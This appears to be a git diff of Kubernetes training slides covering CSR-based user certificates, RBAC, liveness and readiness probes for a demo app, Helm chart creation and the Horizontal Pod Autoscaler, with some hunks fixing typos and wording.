||||
|
||||
- The Kubernetes API exposes CSR resources
|
||||
|
||||
- We can use these resources to issue TLS certificates
|
||||
|
||||
- First, we will go through a quick reminder about TLS certificates
|
||||
|
||||
- Then, we will see how to obtain a certificate for a user
|
||||
|
||||
- We will use that certificate to authenticate with the cluster
|
||||
|
||||
- Finally, we will grant some privileges to that user
|
||||
|
||||
---
|
||||
|
||||
## Reminder about TLS
|
||||
|
||||
- TLS (Transport Layer Security) is a protocol providing:
|
||||
|
||||
- encryption (to prevent eavesdropping)
|
||||
|
||||
- authentication (using public key cryptography)
|
||||
|
||||
- When we access an https:// URL, the server authenticates itself
|
||||
|
||||
(it proves its identity to us; as if it were "showing its ID")
|
||||
|
||||
- But we can also have mutual TLS authentication (mTLS)
|
||||
|
||||
(client proves its identity to server; server proves its identity to client)
|
||||
|
||||
---
|
||||
|
||||
## Authentication with certificates
|
||||
|
||||
- To authenticate, someone (client or server) needs:
|
||||
|
||||
- a *private key* (that remains known only to them)
|
||||
|
||||
- a *public key* (that they can distribute)
|
||||
|
||||
- a *certificate* (associating the public key with an identity)
|
||||
|
||||
- A message encrypted with the private key can only be decrypted with the public key
|
||||
|
||||
(and vice versa)
|
||||
|
||||
- If I use someone's public key to encrypt/decrypt their messages,
|
||||
<br/>
|
||||
I can be certain that I am talking to them / they are talking to me
|
||||
|
||||
- The certificate proves that I have the correct public key for them
|
||||
|
||||
---
|
||||
|
||||
## Certificate generation workflow
|
||||
|
||||
This is what I do if I want to obtain a certificate.
|
||||
|
||||
1. Create public and private keys.
|
||||
|
||||
2. Create a Certificate Signing Request (CSR).
|
||||
|
||||
(The CSR contains the identity that I claim and a public key.)
|
||||
|
||||
3. Send that CSR to the Certificate Authority (CA).
|
||||
|
||||
4. The CA verifies that I can claim the identity in the CSR.
|
||||
|
||||
5. The CA generates my certificate and gives it to me.
|
||||
|
||||
The CA (or anyone else) never needs to know my private key.
|
||||
|
||||
---
|
||||
|
||||
## The CSR API
|
||||
|
||||
- The Kubernetes API has a CertificateSigningRequest resource type
|
||||
|
||||
(we can list them with e.g. `kubectl get csr`)
|
||||
|
||||
- We can create a CSR object
|
||||
|
||||
(= upload a CSR to the Kubernetes API)
|
||||
|
||||
- Then, using the Kubernetes API, we can approve/deny the request
|
||||
|
||||
- If we approve the request, the Kubernetes API generates a certificate
|
||||
|
||||
- The certificate gets attached to the CSR object and can be retrieved
|
||||
|
||||
---
|
||||
|
||||
## Using the CSR API
|
||||
|
||||
- We will show how to use the CSR API to obtain user certificates
|
||||
|
||||
- This will be a rather complex demo
|
||||
|
||||
- ... And yet, we will take a few shortcuts to simplify it
|
||||
|
||||
(but it will illustrate the general idea)
|
||||
|
||||
- The demo also won't be automated
|
||||
|
||||
(we would have to write extra code to make it fully functional)
|
||||
|
||||
---
|
||||
|
||||
## General idea
|
||||
|
||||
- We will create a Namespace named "users"
|
||||
|
||||
- Each user will get a ServiceAccount in that Namespace
|
||||
|
||||
- That ServiceAccount will give read/write access to *one* CSR object
|
||||
|
||||
- Users will use that ServiceAccount's token to submit a CSR
|
||||
|
||||
- We will approve the CSR (or not)
|
||||
|
||||
- Users can then retrieve their certificate from their CSR object
|
||||
|
||||
- ...And use that certificate for subsequent interactions
|
||||
|
||||
---
|
||||
|
||||
## Resource naming
|
||||
|
||||
For a user named `jean.doe`, we will have:
|
||||
|
||||
- ServiceAccount `jean.doe` in Namespace `users`
|
||||
|
||||
- CertificateSigningRequest `users:jean.doe`
|
||||
|
||||
- ClusterRole `users:jean.doe` giving read/write access to that CSR
|
||||
|
||||
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Creating the user's resources
|
||||
|
||||
.warning[If you want to use another name than `jean.doe`, update the YAML file!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the global namespace for all users:
|
||||
```bash
|
||||
kubectl create namespace users
|
||||
```
|
||||
|
||||
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extracting the user's token
|
||||
|
||||
- Let's obtain the user's token and give it to them
|
||||
|
||||
(the token will be their password)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the user's secrets:
|
||||
```bash
|
||||
kubectl --namespace=users describe serviceaccount jean.doe
|
||||
```
|
||||
|
||||
- Show the user's token:
|
||||
```bash
|
||||
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Configure `kubectl` to use the token
|
||||
|
||||
- Let's create a new context that will use that token to access the API
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add a new identity to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials token:jean.doe --token=...
|
||||
```
|
||||
|
||||
- Add a new context using that identity:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the API with the token
|
||||
|
||||
- Let's check that our access rights are set properly
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to access any resource:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
(This should tell us "Forbidden")
|
||||
|
||||
- Try to access "our" CertificateSigningRequest:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe
|
||||
```
|
||||
(This should tell us "NotFound")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create a key and a CSR
|
||||
|
||||
- There are many tools to generate TLS keys and CSRs
|
||||
|
||||
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
|
||||
|
||||
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the key and certificate signing request:
|
||||
```bash
|
||||
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
|
||||
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The command above generates:
|
||||
|
||||
- a 2048-bit RSA key, without encryption, stored in key.pem
|
||||
- a CSR for the name `jean.doe` in group `devs`
|
||||
|
||||
---
|
||||
|
||||
## Inside the Kubernetes CSR object
|
||||
|
||||
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
|
||||
|
||||
- The PEM file needs to be encoded to base64 on a single line
|
||||
|
||||
(we will use `base64 -w0` for that purpose)
|
||||
|
||||
- The Kubernetes CSR object also needs to list the right "usages"
|
||||
|
||||
(these are flags indicating how the certificate can be used)
|
||||
|
||||
---
|
||||
|
||||
## Sending the CSR to Kubernetes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate and create the CSR resource:
|
||||
```bash
|
||||
kubectl apply -f - <<EOF
|
||||
apiVersion: certificates.k8s.io/v1beta1
|
||||
kind: CertificateSigningRequest
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
spec:
|
||||
request: $(base64 -w0 < csr.pem)
|
||||
usages:
|
||||
- digital signature
|
||||
- key encipherment
|
||||
- client auth
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adjusting certificate expiration
|
||||
|
||||
- By default, the CSR API generates certificates valid 1 year
|
||||
|
||||
- We want to generate short-lived certificates, so we will lower that to 1 hour
|
||||
|
||||
- For now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the static pod definition for the controller manager:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
|
||||
```
|
||||
|
||||
- In the list of flags, add the following line:
|
||||
```bash
|
||||
- --experimental-cluster-signing-duration=1h
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying and approving the CSR
|
||||
|
||||
- Let's inspect the CSR, and if it is valid, approve it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Inspect the CSR:
|
||||
```bash
|
||||
kubectl describe csr users:jean.doe
|
||||
```
|
||||
|
||||
- Approve it:
|
||||
```bash
|
||||
kubectl certificate approve users:jean.doe
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to the user's identity:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Retrieve the updated CSR object and extract the certificate:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe \
|
||||
-o jsonpath={.status.certificate} \
|
||||
| base64 -d > cert.pem
|
||||
```
|
||||
|
||||
- Inspect the certificate:
|
||||
```bash
|
||||
openssl x509 -in cert.pem -text -noout
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the key and certificate to kubeconfig:
|
||||
```bash
|
||||
kubectl config set-credentials cert:jean.doe --embed-certs \
|
||||
--client-certificate=cert.pem --client-key=key.pem
|
||||
```
|
||||
|
||||
- Update the user's context to use the key and cert to authenticate:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user cert:jean.doe
|
||||
```
|
||||
|
||||
- Confirm that we are seen as `jean.doe` (but don't have permissions):
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's missing?
|
||||
|
||||
We have just shown, step by step, a method to issue short-lived certificates for users.
|
||||
|
||||
To be usable in real environments, we would need to add:
|
||||
|
||||
- a kubectl helper to automatically generate the CSR and obtain the cert
|
||||
|
||||
(and transparently renew the cert when needed)
|
||||
|
||||
- a Kubernetes controller to automatically validate and approve CSRs
|
||||
|
||||
(checking that the subject and groups are valid)
|
||||
|
||||
- a way for the users to know the groups to add to their CSR
|
||||
|
||||
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
|
||||
|
||||
---
|
||||
|
||||
## Is this realistic?
|
||||
|
||||
- Larger organizations typically integrate with their own directory
|
||||
|
||||
- The general principle, however, is the same:
|
||||
|
||||
- users have long-term credentials (password, token, ...)
|
||||
|
||||
- they use these credentials to obtain other, short-lived credentials
|
||||
|
||||
- This provides enhanced security:
|
||||
|
||||
- the long-term credentials can use long passphrases, 2FA, HSM...
|
||||
|
||||
- the short-term credentials are more convenient to use
|
||||
|
||||
- we get strong security *and* convenience
|
||||
|
||||
- Systems like Vault also have certificate issuance mechanisms
|
||||
@@ -38,7 +38,7 @@
|
||||
|
||||
<!-- ##VERSION## -->
|
||||
|
||||
- Unfortunately, as of Kubernetes 1.15, the CLI cannot create daemon sets
|
||||
- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
|
||||
|
||||
--
|
||||
|
||||
@@ -371,7 +371,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la
|
||||
|
||||
- Bottom line: if we remove our `app=rng` label ...
|
||||
|
||||
... The pod "disappears" for its parent, which re-creates another pod to replace it
|
||||
... The pod "diseappears" for its parent, which re-creates another pod to replace it
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -153,7 +153,5 @@ The dashboard will then ask you which authentication you want to use.
|
||||
|
||||
--
|
||||
|
||||
- It introduces new failure modes
|
||||
|
||||
(for instance, if you try to apply YAML from a link that's no longer valid)
|
||||
- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
|
||||
|
||||
|
||||
@@ -1,67 +0,0 @@
|
||||
## 19,000 words
|
||||
|
||||
They say, "a picture is worth one thousand words."
|
||||
|
||||
The following 19 slides show what really happens when we run:
|
||||
|
||||
```bash
|
||||
kubectl run web --image=nginx --replicas=3
|
||||
```
|
||||
|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
@@ -175,7 +175,7 @@ Success!
|
||||
|
||||
]
|
||||
|
||||
We should get `No resources found.` and the `kubernetes` service, respectively.
|
||||
So far, so good.
|
||||
|
||||
Note: the API server automatically created the `kubernetes` service entry.
|
||||
|
||||
@@ -225,7 +225,7 @@ Success?
|
||||
|
||||
]
|
||||
|
||||
Our Deployment is in bad shape:
|
||||
Our Deployment is in a bad shape:
|
||||
```
|
||||
NAME READY UP-TO-DATE AVAILABLE AGE
|
||||
deployment.apps/web 0/1 0 0 2m26s
|
||||
@@ -584,7 +584,7 @@ Our pod is still `Pending`. 🤔
|
||||
|
||||
Which is normal: it needs to be *scheduled*.
|
||||
|
||||
(i.e., something needs to decide which node it should go on.)
|
||||
(i.e., something needs to decide on which node it should go.)
|
||||
|
||||
---
|
||||
|
||||
@@ -658,7 +658,7 @@ class: extra-details
|
||||
|
||||
- This is actually how the scheduler works!
|
||||
|
||||
- It watches pods, makes scheduling decisions, and creates Binding objects
|
||||
- It watches pods, takes scheduling decisions, creates Binding objects
|
||||
|
||||
---
|
||||
|
||||
@@ -686,7 +686,7 @@ We should see the `Welcome to nginx!` page.
|
||||
|
||||
## Exposing our Deployment
|
||||
|
||||
- We can now create a Service associated with this Deployment
|
||||
- We can now create a Service associated to this Deployment
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -711,11 +711,11 @@ This won't work. We need kube-proxy to enable internal communication.
|
||||
|
||||
## Starting kube-proxy
|
||||
|
||||
- kube-proxy also needs to connect to the API server
|
||||
- kube-proxy also needs to connect to API server
|
||||
|
||||
- It can work with the `--master` flag
|
||||
|
||||
(although that will be deprecated in the future)
|
||||
(even though that will be deprecated in the future)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -832,6 +832,6 @@ class: extra-details
|
||||
|
||||
- By default, the API server expects to be running directly on the nodes
|
||||
|
||||
(it could be as a bare process, or in a container/pod using the host network)
|
||||
(it could be as a bare process, or in a container/pod using host network)
|
||||
|
||||
- ... And it expects to be listening on port 6443 with TLS
|
||||
|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
@@ -87,11 +87,7 @@ There are many possibilities!
|
||||
|
||||
(and take action when they are created/updated)
|
||||
|
||||
*
|
||||
Examples:
|
||||
[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
|
||||
[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
|
||||
*
|
||||
*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
|
||||
|
||||
---
|
||||
|
||||
@@ -117,7 +113,7 @@ Examples:
|
||||
|
||||
## Admission controllers
|
||||
|
||||
- When a Pod is created, it is associated with a ServiceAccount
|
||||
- When a Pod is created, it is associated to a ServiceAccount
|
||||
|
||||
(even if we did not specify one explicitly)
|
||||
|
||||
@@ -163,7 +159,7 @@ class: pic
|
||||
|
||||
- These webhooks can be *validating* or *mutating*
|
||||
|
||||
- Webhooks can be set up dynamically (without restarting the API server)
|
||||
- Webhooks can be setup dynamically (without restarting the API server)
|
||||
|
||||
- To setup a dynamic admission webhook, we create a special resource:
|
||||
|
||||
@@ -171,7 +167,7 @@ class: pic
|
||||
|
||||
- These resources are created and managed like other resources
|
||||
|
||||
(i.e. `kubectl create`, `kubectl get`...)
|
||||
(i.e. `kubectl create`, `kubectl get` ...)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm charts
|
||||
- Gitkube can also deploy Helm Charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -1,393 +0,0 @@
|
||||
## Questions to ask before adding healthchecks
|
||||
|
||||
- Do we want liveness, readiness, both?
|
||||
|
||||
(sometimes, we can use the same check, but with different failure thresholds)
|
||||
|
||||
- Do we have existing HTTP endpoints that we can use?
|
||||
|
||||
- Do we need to add new endpoints, or perhaps use something else?
|
||||
|
||||
- Are our healthchecks likely to use resources and/or slow down the app?
|
||||
|
||||
- Do they depend on additional services?
|
||||
|
||||
(this can be particularly tricky, see next slide)
|
||||
|
||||
---
|
||||
|
||||
## Healthchecks and dependencies

- A good healthcheck should always indicate the health of the service itself

- It should not be affected by the state of the service's dependencies

- Example: a web server requiring a database connection to operate

  (make sure that the healthcheck can report "OK" even if the database is down;
  <br/>
  because it won't help us to restart the web server if the issue is with the DB!)

- Example: a microservice calling other microservices

- Example: a worker process

  (these will generally require minor code changes to report health)
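To make the web server example concrete, here is a minimal sketch (assuming a hypothetical `/healthz` route that answers without touching the database) of a liveness probe that reflects only the health of the web server process:

```yaml
# Illustrative sketch: /healthz is a hypothetical shallow endpoint.
# It does not query the database, so a DB outage will not make
# Kubernetes restart the web server for no good reason.
containers:
  - name: web
    image: my-web-app:1.0          # placeholder image
    livenessProbe:
      httpGet:
        path: /healthz             # shallow check, no dependency calls
        port: 80
      periodSeconds: 10
      failureThreshold: 3
```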
---

## Adding healthchecks to an app

- Let's add healthchecks to DockerCoins!

- We will examine the questions of the previous slide

- Then we will review each component individually to add healthchecks

---
## Liveness, readiness, or both?

- To answer that question, we need to see the app run for a while

- Do we get temporary, recoverable glitches?

  → then use readiness

- Or do we get hard lock-ups requiring a restart?

  → then use liveness

- In the case of DockerCoins, we don't know yet!

- Let's pick liveness
---

## Do we have HTTP endpoints that we can use?

- Each of the 3 web services (hasher, rng, webui) has a trivial route on `/`

- These routes:

  - don't seem to perform anything complex or expensive

  - don't seem to call other services

- Perfect!

  (See next slides for individual details)

---
- [hasher.rb](https://github.com/jpetazzo/container.training/blob/master/dockercoins/hasher/hasher.rb)
  ```ruby
  get '/' do
    "HASHER running on #{Socket.gethostname}\n"
  end
  ```

- [rng.py](https://github.com/jpetazzo/container.training/blob/master/dockercoins/rng/rng.py)
  ```python
  @app.route("/")
  def index():
      return "RNG running on {}\n".format(hostname)
  ```

- [webui.js](https://github.com/jpetazzo/container.training/blob/master/dockercoins/webui/webui.js)
  ```javascript
  app.get('/', function (req, res) {
    res.redirect('/index.html');
  });
  ```

---
## Running DockerCoins

- We will run DockerCoins in a new, separate namespace

- We will use a set of YAML manifests and pre-built images

- We will add our new liveness probe to the YAML of the `rng` DaemonSet

- Then, we will deploy the application

---
## Creating a new namespace

- This will make sure that we don't collide / conflict with previous exercises

.exercise[

- Create the yellow namespace:
  ```bash
  kubectl create namespace yellow
  ```

- Switch to that namespace:
  ```bash
  kns yellow
  ```

]

---
## Retrieving DockerCoins manifests

- All the manifests that we need are on a convenient repository:

  https://github.com/jpetazzo/kubercoins

.exercise[

- Clone that repository:
  ```bash
  cd ~
  git clone https://github.com/jpetazzo/kubercoins
  ```

- Change directory to the repository:
  ```bash
  cd kubercoins
  ```

]

---
## A simple HTTP liveness probe

This is what our liveness probe should look like:

```yaml
containers:
  - name: ...
    image: ...
    livenessProbe:
      httpGet:
        path: /
        port: 80
      initialDelaySeconds: 30
      periodSeconds: 5
```

This gives the service 30 seconds to start. (Way more than necessary!)
<br/>
It will run the probe every 5 seconds.
<br/>
It will use the default timeout (1 second).
<br/>
It will use the default failure threshold (3 failed attempts = dead).
<br/>
It will use the default success threshold (1 successful attempt = alive).
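If we prefer to spell out those defaults explicitly (purely illustrative; the values below are simply the defaults written down), the same probe could be expressed as:

```yaml
livenessProbe:
  httpGet:
    path: /
    port: 80
  initialDelaySeconds: 30
  periodSeconds: 5
  timeoutSeconds: 1       # default timeout
  failureThreshold: 3     # 3 failed attempts = dead
  successThreshold: 1     # 1 successful attempt = alive
```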
---

## Adding the liveness probe

- Let's add the liveness probe, then deploy DockerCoins

.exercise[

- Edit `rng-daemonset.yaml` and add the liveness probe:
  ```bash
  vim rng-daemonset.yaml
  ```

- Load the YAML for all the resources of DockerCoins:
  ```bash
  kubectl apply -f .
  ```

]

---
## Testing the liveness probe

- The rng service needs 100ms to process a request

  (because it is single-threaded and sleeps 0.1s in each request)

- The probe timeout is set to 1 second

- If we send more than 10 requests per second per backend, it will break

- Let's generate traffic and see what happens!

.exercise[

- Get the ClusterIP address of the rng service:
  ```bash
  kubectl get svc rng
  ```

]
---

## Monitoring the rng service

- Each command below will show us what's happening on a different level

.exercise[

- In one window, monitor cluster events:
  ```bash
  kubectl get events -w
  ```

- In another window, monitor the response time of rng:
  ```bash
  httping `<ClusterIP>`
  ```

- In another window, monitor pod status:
  ```bash
  kubectl get pods -w
  ```

]

---
## Generating traffic

- Let's use `ab` to send concurrent requests to rng

.exercise[

- In yet another window, generate traffic:
  ```bash
  ab -c 10 -n 1000 http://`<ClusterIP>`/1
  ```

- Experiment with higher values of `-c` and see what happens

]

- The `-c` parameter indicates the number of concurrent requests

- The final `/1` is important to generate actual traffic

  (otherwise we would use the ping endpoint, which doesn't sleep 0.1s per request)
---

## Discussion

- Above a given threshold, the liveness probe starts failing

  (about 10 concurrent requests per backend should be more than enough)

- When the liveness probe fails 3 times in a row, the container is restarted

- During the restart, there is *less* capacity available

- ... Meaning that the other backends are likely to time out as well

- ... Eventually causing all backends to be restarted

- ... And each fresh backend gets restarted, too

- This goes on until the load goes down, or we add capacity

*This wouldn't be a good healthcheck in a real application!*
---

## Better healthchecks

- We need to make sure that the healthcheck doesn't trip when
  performance degrades due to external pressure

- Using a readiness check would have fewer side effects

  (but it would still be an imperfect solution)

- A possible combination (sketched below):

  - readiness check with a short timeout / low failure threshold

  - liveness check with a longer timeout / higher failure threshold
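Here is a rough sketch of that combination (the endpoint, periods, and thresholds are arbitrary examples, not tuned values):

```yaml
# Illustrative only: readiness reacts quickly (pod taken out of rotation),
# while liveness is much more tolerant (pod restarted only if it stays broken).
readinessProbe:
  httpGet:
    path: /
    port: 80
  periodSeconds: 5
  timeoutSeconds: 1
  failureThreshold: 2
livenessProbe:
  httpGet:
    path: /
    port: 80
  periodSeconds: 10
  timeoutSeconds: 5
  failureThreshold: 6
```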
---

## Healthchecks for redis

- A liveness probe is enough

  (it's not useful to remove a backend from rotation when it's the only one)

- We could use an exec probe running `redis-cli ping`
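That could look roughly like the following (a sketch; the image and timings would be adapted to the actual manifest):

```yaml
containers:
  - name: redis
    image: redis
    livenessProbe:
      exec:
        # redis-cli exits with a non-zero status if the server doesn't answer
        command: ["redis-cli", "ping"]
      initialDelaySeconds: 10
      periodSeconds: 5
```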
---

class: extra-details

## Exec probes and zombies

- When using exec probes, we should make sure that we have a *zombie reaper*

  🤔🧐🧟 Wait, what?

- When a process terminates, its parent must call `wait()`/`waitpid()`

  (this is how the parent process retrieves the child's exit status)

- In the meantime, the process is in *zombie* state

  (the process state will show as `Z` in `ps`, `top` ...)

- When a process is killed, its children are *orphaned* and attached to PID 1

- PID 1 has the responsibility of *reaping* these processes when they terminate

- OK, but how does that affect us?
---

class: extra-details

## PID 1 in containers

- On ordinary systems, PID 1 (`/sbin/init`) has logic to reap processes

- In containers, PID 1 is typically our application process

  (e.g. Apache, the JVM, NGINX, Redis ...)

- These *do not* take care of reaping orphans

- If we use exec probes, we need to add a process reaper

- We can add [tini](https://github.com/krallin/tini) to our images

- Or [share the PID namespace between containers of a pod](https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/)

  (and have gcr.io/pause take care of the reaping)
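The second option is a single field in the pod spec. A minimal sketch (the pod name and image are arbitrary):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: redis-with-shared-pid     # hypothetical name
spec:
  shareProcessNamespace: true     # the pause container becomes PID 1 for the whole pod
  containers:
    - name: redis
      image: redis
      livenessProbe:
        exec:
          command: ["redis-cli", "ping"]
```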
---

## Healthchecks for worker

- Readiness isn't useful

  (because worker isn't a backend for a service)

- Liveness may help us restart a broken worker, but how can we check it?

- Embedding an HTTP server is an option

  (but it has a high potential for unwanted side effects and false positives)

- Using a "lease" file can be relatively easy (see the sketch after this list):

  - touch a file during each iteration of the main loop

  - check the timestamp of that file from an exec probe

- Writing logs (and checking them from the probe) also works
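A minimal sketch of the lease-file idea (the path and the one-minute threshold are arbitrary; the worker's main loop would need a one-line change to `touch /tmp/lease` at each iteration):

```yaml
livenessProbe:
  exec:
    command:
      - sh
      - -c
      # fails if /tmp/lease hasn't been modified in the last minute
      - test "$(find /tmp/lease -mmin -1)"
  periodSeconds: 30
  failureThreshold: 3
```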
@@ -108,7 +108,7 @@

  (as opposed to merely started)

- Containers in a broken state get killed and restarted

  (instead of serving errors or timeouts)

@@ -120,7 +120,7 @@

## Example: HTTP probe

Here is a pod template for the `rng` web service of our DockerCoins sample app:

```yaml
apiVersion: v1
@@ -158,7 +158,7 @@ Where do these `--set` options come from?

]

The chart's metadata includes a URL to the project's home page.

(Sometimes it conveniently points to the documentation for the chart.)

@@ -176,3 +176,77 @@ The chart's metadata includes a URL to the project's home page.
```

]

---
## Creating a chart

- We are going to show a way to create a *very simplified* chart

- In a real chart, *lots of things* would be templatized

  (Resource names, service types, number of replicas...)

.exercise[

- Create a sample chart:
  ```bash
  helm create dockercoins
  ```

- Move away the sample templates and create an empty template directory:
  ```bash
  mv dockercoins/templates dockercoins/default-templates
  mkdir dockercoins/templates
  ```

]

---
## Exporting the YAML for our application

- The following section assumes that DockerCoins is currently running

.exercise[

- Create one YAML file for each resource that we need:
  .small[
  ```bash
  while read kind name; do
    kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
  done <<EOF
  deployment worker
  deployment hasher
  daemonset rng
  deployment webui
  deployment redis
  service hasher
  service rng
  service webui
  service redis
  EOF
  ```
  ]

]

---
## Testing our helm chart

.exercise[

- Let's install our helm chart! (`dockercoins` is the path to the chart)
  ```
  helm install dockercoins
  ```

]

--

- Since the application is already deployed, this will fail:<br>
  `Error: release loitering-otter failed: services "hasher" already exists`

- To avoid naming conflicts, we will deploy the application in another *namespace*
@@ -1,238 +0,0 @@

# The Horizontal Pod Autoscaler

- What is the Horizontal Pod Autoscaler, or HPA?

- It is a controller that can perform *horizontal* scaling automatically

- Horizontal scaling = changing the number of replicas

  (adding/removing pods)

- Vertical scaling = changing the size of individual replicas

  (increasing/reducing CPU and RAM per pod)

- Cluster scaling = changing the size of the cluster

  (adding/removing nodes)
---

## Principle of operation

- Each HPA resource (or "policy") specifies:

  - which object to monitor and scale (e.g. a Deployment, ReplicaSet...)

  - min/max scaling ranges (the max is a safety limit!)

  - a target resource usage (e.g. the default is CPU=80%)

- The HPA continuously monitors the CPU usage for the related object

- It computes how many pods should be running:

  `TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`

- It scales the related object up/down to this target number of pods
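For example, with a target of 80% and three pods currently at 120%, 110%, and 90% of their CPU request, the HPA would aim for `ceil(320 / 80) = 4` pods. Written as a manifest, such a policy could look roughly like this (the names and values are illustrative):

```yaml
apiVersion: autoscaling/v1
kind: HorizontalPodAutoscaler
metadata:
  name: web                        # hypothetical policy name
spec:
  scaleTargetRef:                  # which object to monitor and scale
    apiVersion: apps/v1
    kind: Deployment
    name: web
  minReplicas: 2                   # scaling range
  maxReplicas: 10                  # safety limit
  targetCPUUtilizationPercentage: 80
```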
---

## Prerequisites

- The metrics server needs to be running

  (i.e. we need to be able to see pod metrics with `kubectl top pods`)

- The pods that we want to autoscale need to have resource requests

  (because the target CPU% is not absolute, but relative to the request)

- The latter actually makes a lot of sense:

  - if a Pod doesn't have a CPU request, it might be using 10% of CPU...

  - ...but only because there is no CPU time available!

  - this makes sure that we won't add pods to nodes that are already resource-starved
---

## Testing the HPA

- We will start a CPU-intensive web service

- We will send some traffic to that service

- We will create an HPA policy

- The HPA will automatically scale up the service for us

---
## A CPU-intensive web service

- Let's use `jpetazzo/busyhttp`

  (it is a web server that will use 1s of CPU for each HTTP request)

.exercise[

- Deploy the web server:
  ```bash
  kubectl create deployment busyhttp --image=jpetazzo/busyhttp
  ```

- Expose it with a ClusterIP service:
  ```bash
  kubectl expose deployment busyhttp --port=80
  ```

- Port-forward to our service:
  ```bash
  kubectl port-forward service/busyhttp 8080:80 &
  curl -k localhost:8080
  ```

]
---

## Monitor what's going on

- Let's use some commands to watch what is happening

.exercise[

- Monitor pod CPU usage:
  ```bash
  kubectl top pods
  ```

- Monitor cluster events:
  ```bash
  kubectl get events -w
  ```

]

---
## Send traffic to the service

- We will use [hey](https://github.com/rakyll/hey/releases) to send traffic

.exercise[

- Send a lot of requests to the service with a concurrency level of 3:
  ```bash
  curl https://storage.googleapis.com/jblabs/dist/hey_linux_v0.1.2 > hey
  chmod +x hey
  ./hey http://localhost:8080 -c 3 -n 200
  ```

]

The CPU utilization should increase to 100%.

(The server is single-threaded and won't go above 100%.)
---

## Create an HPA policy

